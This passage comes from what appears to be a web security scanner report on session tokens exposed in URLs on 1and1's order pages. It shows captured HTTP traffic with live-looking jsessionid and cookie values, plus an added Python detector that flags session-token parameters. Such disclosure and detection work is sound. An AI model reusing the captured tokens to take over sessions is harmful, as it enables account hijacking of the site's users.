Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://order.1and1.com/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=domaincheck&linkId=hd.tab.yourcart
Content-Length: 0
Connection: close
Content-Type: text/plain


3.106. http://order.1and1.com/xml/order/domaincheck

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The URL in the request appears to contain a session token, carried as the ;jsessionid= path parameter shown in the request line and in the Referer header below.

Request

GET /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642646570&__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMoL19oLiEiHh0iHxw2MTQ1Li8=; Expires=Fri, 07-Apr-2079 20:51:35 GMT; Path=/
ETag: 9d266795a44ed2da88d7a484c599a6b6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 20142


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.107. http://order.1and1.com/xml/order/domaincheck

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The response contains the following links that appear to contain session tokens: every navigation link in the HTML excerpt below is URL-rewritten with the ;jsessionid= path parameter, so the token is re-emitted on each page and follows the user into browser history, logs and Referer headers.

Request

GET /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642646570&__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMoL19oLiEiHh0iHxw2MTQ1Li8=; Expires=Fri, 07-Apr-2079 20:51:35 GMT; Path=/
ETag: 9d266795a44ed2da88d7a484c599a6b6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 20142


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=domaincheck&amp;linkOrigin=domaincheck&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=domaincheck&amp;page=switch&amp;linkOrigin=domaincheck&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?linkType=&amp;linkOrigin=&amp;linkid=hd.tab.packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<div class="all_link"><a rel="height=600, width=700" class="window-open" href="/xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order">
All domain prices
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=domaincheck&amp;linkOrigin=domaincheck&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...
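Findings 3.100 to 3.107 above are a single issue: the servlet session identifier is URL-rewritten into the ;jsessionid= path parameter, so it shows up in request lines, in Referer headers, in redirect Location headers (3.105 keeps it, 3.101 and 3.104 drop it) and in every link of the rendered pages. The following Python script is an added example, not part of the XSS.CX report or of Burp Suite; it reproduces that passive check over raw HTTP messages. The host order.example.com, the token value and the sample messages are constructed for illustration, and the list of session-parameter names beyond jsessionid is an assumption.

```python
"""Passive check for session tokens carried in URLs (the finding class in
3.100-3.109).  Added example, not part of the scanner report."""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

# Session-parameter names to flag.  Only jsessionid occurs in the report above;
# the other names are an assumption added for coverage.
SESSION_NAMES = re.compile(r"(?i)^(jsessionid|phpsessid|asp\.net_sessionid|sessionid|sid)$")


def tokens_in_url(url):
    """Return [(where, name, value)] for session tokens in a URL.  Servlet
    containers rewrite the token as a path parameter (/p;jsessionid=X?q=1),
    so path segments are inspected as well as the query string."""
    found = []
    parts = urlsplit(url)  # urlsplit leaves ';name=value' inside .path
    for segment in parts.path.split("/"):
        for param in segment.split(";")[1:]:
            name, _, value = param.partition("=")
            if SESSION_NAMES.match(name):
                found.append(("path", name, value))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if SESSION_NAMES.match(name):
            found.append(("query", name, value))
    return found


class _LinkCollector(HTMLParser):
    """Collect href/src/action values; HTMLParser unescapes &amp; for us."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        self.urls += [v for k, v in attrs if k in ("href", "src", "action") and v]


def _split_message(raw):
    """Raw HTTP message -> (start line, [(lowercased name, value)], body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = [(n.strip().lower(), v.strip()) for n, _, v in
               (line.partition(":") for line in lines[1:])]
    return lines[0], headers, body


def check_request(raw_request):
    """Tokens in the request target and in the Referer header."""
    start, headers, _ = _split_message(raw_request)
    findings = [("request-line",) + t for t in tokens_in_url(start.split(" ", 2)[1])]
    for name, value in headers:
        if name == "referer":
            findings += [("referer",) + t for t in tokens_in_url(value)]
    return findings


def check_response(raw_response):
    """Tokens in a redirect Location header and in links of an HTML body."""
    _, headers, body = _split_message(raw_response)
    findings = [("location",) + t for n, v in headers if n == "location"
                for t in tokens_in_url(v)]
    links = _LinkCollector()
    links.feed(body)
    for url in links.urls:
        findings += [("link",) + t for t in tokens_in_url(url)]
    return findings


# Constructed samples modelled on the traffic above; the token value is made up.
TOKEN = "0123456789ABCDEF0123456789ABCDEF.node1"
SAMPLE_REQUEST = (
    f"GET /xml/order/costs;jsessionid={TOKEN}?__frame=_top&linkId=hd.tab.yourcart HTTP/1.1\r\n"
    "Host: order.example.com\r\n"
    f"Referer: http://order.example.com/xml/order/domaincheck;jsessionid={TOKEN}?__frame=_top\r\n\r\n"
)
SAMPLE_REDIRECT_KEEPS_TOKEN = (  # like 3.105: http -> https, token preserved
    "HTTP/1.1 302 Moved Temporarily\r\n"
    f"Location: https://order.example.com/xml/order/costs;jsessionid={TOKEN}?__frame=_top\r\n"
    "Content-Length: 0\r\n\r\n"
)
SAMPLE_REDIRECT_DROPS_TOKEN = (  # like 3.101/3.104: token stripped by the 301
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Location: http://order.example.com/xml/order/addon?__frame=_top\r\n"
    "Content-Length: 0\r\n\r\n"
)
SAMPLE_PAGE = (  # like 3.107: rewritten links in the HTML body
    "HTTP/1.1 200 OK\r\nContent-Type: text/html;charset=UTF-8\r\n\r\n"
    f'<a href="/xml/order/Home;jsessionid={TOKEN}?__frame=_top&amp;__lf=Order">Home</a>'
    '<a href="/xml/order/Gtc?__frame=_top">T&amp;C</a>'
    f'<form action="/xml/order/costs;jsessionid={TOKEN}"></form>'
)
```

Run check_request on each captured request and check_response on each response; a finding tuple names where the token sat (request-line, referer, location or link), the parameter name and its value, which is enough to group repeated findings by token value as the report above does per URL. The 301 sample returns no finding, which mirrors 3.101 and 3.104: the redirect itself is clean, and the exposure is the token already sent in the request.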

3.108. http://order.1and1.com/xml/order/eshopupselling

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/eshopupselling

Issue detail

The URL in the request appears to contain a session token, carried as the ;jsessionid= path parameter shown in the request line and in the Referer header below.

Request

GET /xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642661298&__frame=&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 20:51:50 GMT; Path=/
ETag: 9764ec14efbf07d8da12215d59db0368
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19469


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.109. http://order.1and1.com/xml/order/eshopupselling

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/eshopupselling

Issue detail

The response contains the following links that appear to contain session tokens: every navigation link in the HTML excerpt below is URL-rewritten with the ;jsessionid= path parameter, so the token is re-emitted on each page and follows the user into browser history, logs and Referer headers.

Request

GET /xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642661298&__frame=&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 20:51:50 GMT; Path=/
ETag: 9764ec14efbf07d8da12215d59db0368
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19469


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=eshopupselling&amp;linkOrigin=eshopupselling&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=eshopupselling&amp;page=switch&amp;linkOrigin=eshopupselling&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
